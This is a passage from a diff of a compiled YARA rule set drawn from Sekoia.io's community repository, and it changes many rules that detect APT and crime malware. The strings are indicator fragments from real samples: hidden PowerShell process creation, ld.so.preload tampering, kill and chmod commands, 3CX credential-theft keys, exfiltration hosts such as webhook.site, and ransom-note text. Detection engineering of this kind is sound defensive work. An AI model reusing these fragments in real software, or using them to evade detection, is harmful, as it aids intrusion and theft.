+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_mainpowershellimplant.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0bff0ee2960ecfa29939720e7efacaa35359f4fe555ae160c674efebf29bf61e"
+		logic_hash = "37ec263dddf7719d03a3d58b4b196597737a1e28f8072f3933cdf954f2b696cd"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251285,56 +251222,64 @@ rule SEKOIA_Apt_Mustangpanda_Downloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Windows Api" wide nocase
-		$ = "200 OK" wide
-		$ = "200 ok" wide
-		$ = "mscoree.dll" wide
+		$c1 = "priority FOREGROUND"
+		$c2 = "app|Services|RuntimeBroker|Search|host"
+		$c3 = "([wmiclass]\"win32_Process\").create("
+		$c4 = "Start-Sleep -seconds"
+		$c5 = "while($e -eq 1){ $dCnt++;"
+		$d1 = "112,114,105,111,114,105,116,121,32,70,79,82,69,71,82,79,85,78,68"
+		$d2 = "97,112,112,124,83,101,114,118,105,99,101,115,124,82,117,110,116,105,109,101,66,114,111,107,101,114,124,83,101,97,114,99,104,124,104,111,115,116"
+		$d3 = "40,91,119,109,105,99,108,97,115,115,93,34,119,105,110,51,50,95,80,114,111,99,101,115,115,34,41,46,99,114,101,97,116,101,40"
+		$d4 = "83,116,97,114,116,45,83,108,101,101,112,32,45,115,101,99,111,110,100,115"
+		$d5 = "119,104,105,108,101,40,36,101,32,45,101,113,32,49,41,123,32,36,100,67,110,116,43,43,59"
+		$b1 = "priority FOREGROUND" base64
+		$b2 = "app|Services|RuntimeBroker|Search|host" base64
+		$b3 = "([wmiclass]\"win32_Process\").create(" base64
+		$b4 = "Start-Sleep -seconds" base64
+		$b5 = "while($e -eq 1){ $dCnt++;" base64
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		3 of ( $c* ) or 3 of ( $d* ) or 3 of ( $b* ) and filesize < 30KB
 }
-rule SEKOIA_Downloader_Kimsuky_Lnk
+rule SEKOIA_Apt_Apt29_Quarterrig
 {
 	meta:
-		description = "Detect Kimsuky LNK"
+		description = "Detects QUARTERRIG"
 		author = "Sekoia.io"
-		id = "3831d115-7874-4bc9-aeb4-d2cb9bc2b5c9"
-		date = "2024-07-16"
+		id = "e370ed7e-5e12-4add-95f3-3773ea8e2d03"
+		date = "2023-04-19"
 		modified = "2024-12-19"
-		reference = "https://blogs.jpcert.or.jp/en/2024/07/attack-activities-by-kimsuky-targeting-japanese-organizations.html"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_kimsuky_lnk.yar#L1-L22"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt29_quarterrig.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3512c8c21203a015b316c2a993db1a8c10420df06ea97d84a6e350550a628230"
+		logic_hash = "9628418789a9bc24c7e44dbc9106ffa6316aefebe33b91c749b54cb5462b1309"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "3065b8e4bb91b4229d1cea671e8959da8be2e7482067e1dd03519c882738045e"
-		hash2 = "d912f49d24792aa7197509f76e2097ac3858cde23199e1b40f2516948d39c589"
-		hash3 = "e936445935c4a636614f7113e4121695a5f3e4a6c137b7cdcceb6f629aa957c4"
-		hash4 = "fe156159a26f8b7c140db61dd8b136e1c8103a800748fe9b70a3a3fdf179d3c3"
 
 	strings:
-		$ = "AType: Text Document" wide
-		$ = "Size: 5.23 KB" wide
-		$ = "Date modified: 01/02/2020 11:23" wide
+		$str_dll_name = "hijacker.dll"
+		$str_import_name = "VCRUNTIME140.dll"
+		$op_resolve_and_call_openthread = { 48 [6] 48 [6] 8B D8 E8 [4] [3] 33 D2 B9 FF FF 1F 00 FF D0 }
+		$op_resolve_and_call_suspendthread = { E8 [4] 48 8B CB FF D0 83 F8 FF }
 
 	condition:
 		all of them
 }
-rule SEKOIA_Hacktool_Dnscat2_Strings : FILE
+rule SEKOIA_Kimsuky_Konni_Dll : FILE
 {
 	meta:
-		description = "Detects DNSCat2 based on strings"
+		description = "Rule based on structure offset and file extension"
 		author = "Sekoia.io"
-		id = "9655cdd7-c7fe-4033-bdd9-bdfcfd2bf827"
-		date = "2022-02-25"
+		id = "6a20c492-e932-41bd-ac4a-01d35bfb0c49"
+		date = "2022-09-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_dnscat2_strings.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/kimsuky_konni_dll.yar#L1-L29"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "40d906ca3a00f7d3e2f8d043dbbc77a2a57fd133f4812b863aec6d5a0f57a8c9"
+		logic_hash = "7099156decdfe35cde22958133d851479f12180fff7b5744af0c549ab8259636"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251342,29 +251287,50 @@ rule SEKOIA_Hacktool_Dnscat2_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Creating a exec('%s') session!"
-		$ = "RROR parsing --dns"
-		$ = "Got a ping request! Responding!"
-		$ = "[Tunnel %d] Received %zd bytes"
-		$ = "[Tunnel %d] connection to %s:%d"
-		$ = "You'll need to use --dns server=<server>"
-		$ = "Setting delay between packets to %dms"
+		$ext_1 = ".zip" wide ascii fullword
+		$ext_2 = ".cab" wide ascii fullword
+		$ext_3 = ".rar" wide ascii fullword
+		$ext_4 = ".ini" wide ascii fullword
+		$ext_5 = ".dat" wide ascii fullword
+		$offset_structure_1 = { 8d ?? 08 02 00 00 }
+		$offset_structure_2 = { 8d ?? 10 04 00 00 }
+		$offset_structure_3 = { 8d ?? 18 06 00 00 }
+		$offset_structure_4 = { 8d ?? 20 08 00 00 }
+		$offset_structure_5 = { 8d ?? 28 0a 00 00 }
+		$offset_structure_6 = { 89 ?? f8 11 00 00 }
+		$offset_structure_7 = { 8d ?? fc 11 00 00 }
+		$offset_structure_8 = { 89 ?? 0c 12 00 00 }
+		$offset_structure_9 = { 89 ?? 10 12 00 00 }
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 11MB and all of them
 }
-rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_2 : FILE
+rule SEKOIA_Apt_Icepeony_Icecache : FILE
 {
 	meta:
-		description = "UAC-0154 Infection chain"
+		description = "Detects IceCache backdoor"
 		author = "Sekoia.io"
-		id = "6fe37d52-9bd3-4aa8-83ba-15399bd1b66c"
-		date = "2023-10-02"
+		id = "3135c70e-c925-4d26-beed-09424fc0c153"
+		date = "2024-10-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uac0154_powershell_infection_chain_2.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_icepeony_icecache.yar#L1-L46"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "029d88971030a377b3c93ba4c986668e53b01ee03ba94a0a4ceb54b20b72ff2d"
+		hash = "38708c33dafb5625ddde1030a7efa7db"
+		hash = "1e102c8909b2bf71c626b81f7526ee01"
+		hash = "34bc3c586a48f836b00aff59fe891b30"
+		hash = "cd906f4cef84dddeb644b06777474b2e"
+		hash = "add23fedfbf238f51173796f3feb12af"
+		hash = "25b8daaa5e9c5f8820261d7ebf79f3cd"
+		hash = "7fd45cc1de1230c916d5f547a9fc725c"
+		hash = "e6e4060e838d7af5f13ad64258d5db0c"
+		hash = "87dfc911885420380bea0cf74c8160d3"
+		hash = "bd15103b300cad635191972330913d17"
+		hash = "a8119b7803a6e0b8aed6bc74d9062b7f"
+		hash = "e1bc3efc33b57c9e1e6d37e5011228f2"
+		hash = "e1233a5f613aafec2c28133e810f536d"
+		hash = "fe88a5b91841b25b4bafa08d42faab22"
+		logic_hash = "db82489e1a1eb55960b7a8fd3e6f52db526295ed4e5b90ddea826c5be5f9a1c4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251372,77 +251338,91 @@ rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_2 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "files.catbox.moe"
-		$ = "$pse = $pse.Replace"
-		$ = "start -WindowStyle Hidden -FilePath $p"
-		$ = "-bxor $xorMask"
-		$ = "SysctlHost"
+		$ = "Source Response Empty!"
+		$ = "Source Response Len:"
+		$ = "GetFromSource:"
+		$ = "Failed add header!"
+		$ = "Failed receive response:"
+		$ = "Error: Status Code :"
+		$ = "WinHttpAddRequestHeaders"
+		$ = "X-FORWARDED-HOST:"
+		$ = "PROXY_DEL_CONTENT"
+		$ = "PROXY_CLEAR_CONTENT"
+		$ = "PROXY_SET_JS"
+		$ = "PROXY_GET_JS"
+		$ = "PROXY_ALLOW_PC"
+		$ = "Parse IP failed :"
+		$ = "Clear Proxy Contents Success!"
+		$ = "FILE_UPLOAD"
+		$ = "FILE_DOWNLOAD"
 
 	condition:
-		4 of them and filesize < 100KB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 6 of them
 }
-rule SEKOIA_Tool_Runpeinmemory_Strings : FILE
+
+rule SEKOIA_Apt_Badmagic_Modules
 {
 	meta:
-		description = "Detects standard implementation of RunPEInMemory"
+		description = "Detect the modules used by the CloudWizard framework"
 		author = "Sekoia.io"
-		id = "64129ab0-b599-4760-ab21-20c475c2c07f"
-		date = "2024-05-23"
+		id = "e4f1f706-4a46-4a09-b598-e4e8d80f2c4b"
+		date = "2023-05-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_runpeinmemory_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_modules.yar#L3-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "154f3db98f8ee902ec7b58812525dbbef837ae30279c40b8d95ec93ae1260a69"
-		score = 75
+		hash = "no hash has been found on 2023-05-25 to test the rule"
+		logic_hash = "6f8bc35dbf0fd4083a8d93b04b55b2e0e215cd23350243ddd7ba9dd4745c4496"
+		score = 50
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = "[+] Fix Import Address Table"
-		$ = "[+] Relocation Fixed."
-		$ = "[+] File %s isn't a PE file."
-
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
+		pe.DLL and pe.exports ( "Start" ) and pe.exports ( "Stop" ) and pe.exports ( "Whoami" ) and pe.exports ( "GetResult" ) and pe.exports ( "GetSettings" )
 }
-
-rule SEKOIA_Loader_Win_Dodgebox
+rule SEKOIA_Apt_Cloudmensis_Spyagent_Strings : FILE
 {
 	meta:
-		description = "Detect the DodgeBox malware using several criteria"
+		description = "Detects CloudMensis SpyAgent"
 		author = "Sekoia.io"
-		id = "8d5f94f3-1add-4f34-ba9e-f8f576c4e5b8"
-		date = "2024-07-15"
+		id = "c2df8373-6698-4b23-9d77-8e7968bd69f0"
+		date = "2022-07-26"
 		modified = "2024-12-19"
-		reference = "https://www.zscaler.com/blogs/security-research/dodgebox-deep-dive-updated-arsenal-apt41-part-1"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_dodgebox.yar#L4-L29"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudmensis_spyagent_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e859da15a065454d273c4040b4e3409c3046cbcee135497bdcce6cff620c3cfb"
+		logic_hash = "ad858b1b78fb4ac6efee093b11fde14956d63bc6b300ef37bf1f2a3356cf4402"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "c6a3a1ea84251aed908702a1f2a565496d583239c5f467f5dcd0cfc5bfb1a6db"
-		hash2 = "33fd050760e251ab932e5ca4311b494ef72cee157b20537ce773420845302e49"
+
+	strings:
+		$ = "[control_thread loop_DirStructure:]"
+		$ = "[screen_keylog getScreenShotData]"
+		$ = "[screen_keylog loop_usb]"
+		$ = "[Management UploadFilebyPath:destination:]"
+		$ = "[control_thread loop_pwd:]"
 
 	condition:
-		pe.imphash( ) == "aeea1135af87e6b6b23fa7da995967ea" or hash.md5 ( pe.rich_signature.clear_data ) == "1c850cf955b35f60ee6c12d01161d95d" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "4a80edcce2a5ac85c3f849172ee89c0f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "53781057440f51882c38d3a9ef611775" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "801b286d84a97fe919721843ab77210d" )
+		uint32be( 0 ) == 0xcafebabe and filesize < 2MB and all of them
 }
-rule SEKOIA_Apt_Sandworm_Olympicdestroyer : FILE
+rule SEKOIA_Tool_Win_Driverjack : FILE
 {
 	meta:
-		description = "Detects OlympicDestroyer malware"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "6820eb32-fea2-4a00-a5a2-672ba09f8206"
-		date = "2022-04-15"
+		id = "08bc0fe8-38f1-4c73-99c8-2659b4a55815"
+		date = "2024-09-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_olympicdestroyer.yar#L1-L21"
+		reference = "https://github.com/klezVirus/DriverJack/blob/master/DriverJack"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_driverjack.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a68a96ab036e69a32e173b2d2fa6a81ab872032f89bfdfc3cd4446305a33921b"
+		hash = "649fc12915bdcdebbc3798a8ad0b9b32"
+		logic_hash = "0ea81c32b75ff66434f0c949be7d1478ce9268eb1b67dc5b7d6c7604cedcd72c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251450,58 +251430,59 @@ rule SEKOIA_Apt_Sandworm_Olympicdestroyer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "cmd.exe /c (ping 0.0.0.0 > nul)" wide
-		$ = "if exist %programdata%\\evtchk.txt" wide
-		$ = "\\\\.\\pipe\\%ls" wide
-		$ = "%ProgramData%\\%COMPUTERNAME%.exe" wide
-		$ = "(exit 5) else ( type nul >" wide
-		$ = "Select * From Win32_ProcessStopTrace" nocase
+		$ = "(*) Decrypting %llu bytes of file content using key '%s' of length %u..."
+		$ = "(*) Modifying file %s in mapped drive..."
+		$ = "(*) Checking file %s in mapped drive..."
+		$ = "(-) CreateProcess failed '%s' (%08x)."
+		$ = "(*) Mounted Drive Letter: %s"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Apt31_Pakdoor : FILE
+rule SEKOIA_Tool_Tokenplayer_Strings : FILE
 {
 	meta:
-		description = "Detects APT31 ORB implant - 2019/2021"
+		description = "Detects TokenPlayer based on strings"
 		author = "Sekoia.io"
-		id = "463b8d0d-30f4-45ed-8f19-4b32436fbbf0"
-		date = "2021-10-11"
+		id = "74ed8812-f113-47a9-9ff2-6cbe2746ee11"
+		date = "2024-11-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt31_pakdoor.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_tokenplayer_strings.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "1d60edb577641ce47dc2a8299f8b7f878e37120b192655aaf80d1cde5ee482d2"
-		logic_hash = "ef001e31b34761688f32ec767082d9d7f9fc4e4368d567eb64b66583bcb7fc78"
+		hash = "f01eae4ee3cc03d621be7b0af7d60411"
+		logic_hash = "e419fa8c690816cd0e449f0a1d66d170e8806b38a99758631719b239363e330e"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		version = "1.0"
 
 	strings:
-		$s1 = "mv -f %s %s ;chmod 777 %s"
-		$s2 = "GET /plain HTTP/1.1"
-		$s3 = "exc_cmd time out"
-		$s4 = "exc_cmd pipe err"
-		$s5 = { 2e 2f [1-10] 20 20 64 65 6c }
+		$ = "[*]Spawning Process as user: %s\\%s" wide
+		$ = "[-]Target isn't vulnerable!"
+		$ = "[+]Process spawned!"
+		$ = "[+]Process Spawned"
+		$ = "[+]OpenProcessToken() success!"
+		$ = "CreateProcessWithLogonW() error : % u"
+		$ = "[+]CreateProcessWithLogonW() succeed!"
+		$ = "TokenPlayer.pdb"
 
 	condition:
-		int32be ( 0 ) == 0x7f454c46 and filesize < 800KB and filesize > 400KB and 4 of ( $s* )
+		uint16be( 0 ) == 0x4d5a and 5 of them and filesize < 500KB
 }
-rule SEKOIA_Crime_Sload_Zip_Archives : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_6 : FILE
 {
 	meta:
-		description = "Detects ZIP archives used by sLOad"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "5335ad65-bca5-4937-8634-46cbd7aa1b0e"
-		date = "2022-08-01"
+		id = "53506a3e-b0d8-4a1e-88d9-485e829f25cb"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_zip_archives.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_6.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f2bc6464de008f2ce40acabd87ebbd91659d317f57e223118937ba51f70d0f7f"
+		logic_hash = "38919408d2d0a9f51822302f4f821bf5776f119bf0d1b54b71b1040c7ad59da5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251509,116 +251490,107 @@ rule SEKOIA_Crime_Sload_Zip_Archives : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$pic = { 00 00 00 [6] 2E ( 70 6E 67 | 67 69 66 | 6a 70 67 | 6A 70 65 67 ) }
-		$pdf = { 00 00 00 [8] 2E 70 64 66 }
-		$vbs = { ( 4c 65 67 67 69 6d 69 | 66 69 73 63 ) 2e ( 77 73 66 | 76 62 73 ) }
+		$ = "function ${rc4Function}(r,o){for("
+		$ = "function ${b64AndRC4Function}(r,o){var"
+		$ = "Real-Time Scanning: No threats detected"
+		$ = "Please wait while your file is being downloaded..."
 
 	condition:
-		uint16be( 0 ) == 0x504B and filesize < 30KB and all of them
+		3 of them and filesize < 2MB
 }
-rule SEKOIA_Ransomware_Linux_Icefire_2023 : FILE
+rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc : FILE
 {
 	meta:
-		description = "Rule to detect Linux IceFire ransomware samples."
+		description = "Detects some suspected APT28 document"
 		author = "Sekoia.io"
-		id = "b04964f4-3fdc-4745-9f4a-95a5a79bc7e1"
-		date = "2023-02-13"
+		id = "2b9d597a-a6cd-49df-8938-7103342a1d06"
+		date = "2024-07-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_linux_icefire_2023.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_apt28_uac0063_malicious_doc.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "25033bd33311b070809d150f60803f32011d78a6a74d6b5f620a3216f0f95a6e"
-		score = 75
+		hash = "93322be0785556e627d2b09832c18e39c115e6a6fbff64b1e590e1ddcf8f6a43"
+		logic_hash = "27aeadbb76dd4e670a85e8fcd1e885b69845537dd937aacc1808902e75008848"
+		score = 65
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "e9cc7fdfa3cf40ff9c3db0248a79f4817b170f2660aa2b2ed6c551eae1c38e0b"
 
 	strings:
-		$string01 = "********************Your network has been infected!!!********************"
-		$string02 = "IMPORTANT : DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED!!!"
-		$string03 = "username:"
-		$string04 = "password:"
-		$string05 = ".cfg.o.sh.img.txt.xml.jar.pid.ini.pyc.a.so.run.env.cache.xmlb"
-		$string06 = "./boot./dev./etc./lib./proc./srv./sys./usr./var./run"
-		$string07 = "/iFire-readme.txt"
-		$string08 = ".iFire"
-		$string09 = "iFire.pid"
+		$ = "Sub pop() : : End Sub" ascii fullword
+		$ = "%localappdata%\\Temp" ascii fullword
+		$ = "rthedbv" ascii fullword
 
 	condition:
-		uint32be( 0 ) == 0x7F454C46 and all of them
+		2 of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Apt28_Document_Phishing_Webpage : FILE
+rule SEKOIA_Apt_Kimsuky_Sharpext_Devps1_Strings : FILE
 {
 	meta:
-		description = "Detects APT28 document phishing webpage"
+		description = "Detects strings of Dev.ps1"
 		author = "Sekoia.io"
-		id = "585a8e23-c302-41d3-938f-eda60c82ef28"
-		date = "2024-04-08"
+		id = "f2ad32a4-bfca-40b2-964e-b8562538a6f2"
+		date = "2022-07-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_document_phishing_webpage.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharpext_devps1_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b64888c1d8568cf9d8f4dfcd2e18093db8635966d88abaa368dc46a1e4453782"
+		logic_hash = "32e96440838bf63679b2a05ce4e6c226bed515ceb5180e3cf079206e21a0c0c5"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "webhook.site"
-		$ = "document.createElement('img')"
-		$ = "brightness(15%) blur(7.0px)"
-		$ = "This document is not available from mobile devices."
-		$ = "Capture2.PNG"
-		$ = ">CLICK TO VIEW DOCUMENT<"
-		$ = "window.location.href = 's"
-		$ = ".oast."
+		$s1 = "keybd_Event(" ascii fullword
+		$s2 = "Sleep" ascii fullword
+		$s3 = "CreateDev" ascii fullword
 
 	condition:
-		4 of them and filesize < 20KB
+		filesize < 10KB and #s1 == 6 and #s2 == 6 and $s3
 }
-rule SEKOIA_Apt_Apt35_Iisraid_Strings : FILE
+rule SEKOIA_Downloader_Mac_Rustbucket_Swiftloader
 {
 	meta:
-		description = "Detects APT35s ISSRaid implant"
+		description = "Detect the file com.EdoneViewer in the new version of RustBucker 2023-10"
 		author = "Sekoia.io"
-		id = "ee42f406-0c7e-4385-9098-409611dbe0a5"
-		date = "2023-05-11"
+		id = "bdbc95db-5d58-4c96-91f9-34b653e67f50"
+		date = "2023-12-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt35_iisraid_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_mac_rustbucket_swiftloader.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "de2ebef5ab46136aa54b146dbd4198f69801f3414d1d239fc7983c5b3c0115c4"
+		logic_hash = "acb5b88f8af53cd3d83de0fd6c3049ce017f038dc7c8b31f70e65e60bf713dfb"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "7c5bf60787bfd076c8806eaa4f1185f5b9fda69008376624ab3d17f207eb16a4"
+		hash2 = "bc90adde92bd47b4de7d384e5b20c1a1791d603629bd0fcba4b550fb35e93216"
+		hash3 = "c9a7b42c7b29ca948160f95f017e9e9ae781f3b981ecf6edbac943e52c63ffc8"
 
 	strings:
-		$ = "CHttpModule::"
-		$ = "X-Forward-Verify"
-		$ = "X-Beserver-Verify"
+		$ = "/Users/ghost/Desktop/EdoneViewer/EdoneViewer/"
+		$ = "EdoneViewerApp.swift"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
+		1 of them
 }
-rule SEKOIA_Apt_Gelsemium_Wolfsbane_Launcher : FILE
+rule SEKOIA_Implant_Mac_Smoothoperator_Update_Agent : FILE
 {
 	meta:
-		description = "Detects Gelsemium's WolfsBane launcher"
+		description = "UpdateAgent payload delivered by SmoothOperator during the 3CX supply chain attack"
 		author = "Sekoia.io"
-		id = "26fbf4df-aa08-47b6-a73c-e8f80a408454"
-		date = "2024-11-22"
+		id = "45a1d0d9-083b-4b4a-b53c-e5d86f804f01"
+		date = "2023-07-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gelsemium_wolfsbane_launcher.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_mac_smoothoperator_update_agent.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "87e437cf74ce4b1330b8af9ff71edae2"
-		logic_hash = "9ecc3a8cb82f6183c263dde03a14f721d2e3aeb2338afc28e0368c323e5d51a9"
+		logic_hash = "d5a0d87ac810097983df92ab1b1ff9775093b0aaaf551a74ff6fe5149dbd3a21"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -251626,26 +251598,26 @@ rule SEKOIA_Apt_Gelsemium_Wolfsbane_Launcher : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "rm -f /dev/shm/sem*%s"
-		$ = "/etc/ld.so.preload"
-		$ = "kill -9 %d 2>/dev/null"
-		$ = "/,1d' %s 2>/dev/null"
+		$ = "3CX Desktop App/.main_storage"
+		$ = "3CX Desktop App/config.json"
+		$ = "3cx_auth_token_content=%s"
+		$ = "3cx_auth_id=%s"
 
 	condition:
-		uint32be( 0 ) == 0x7F454C46 and filesize < 500KB and all of them
+		uint32be( 0 ) == 0xcffaedfe and 2 of them
 }
-rule SEKOIA_Apt_Tortoiseshell_Imaploader : FILE
+rule SEKOIA_Rootkit_Win_Purplefox_360_Tct : FILE
 {
 	meta:
-		description = "Detects IMAPLoader malware"
+		description = "Detects Purple Fox payloads used during end-2021 and 2022 campaigns based on characteristics shared by TrendMicro details."
 		author = "Sekoia.io"
-		id = "e1706b59-5c94-4fbf-8560-0022ca631d1d"
-		date = "2023-11-13"
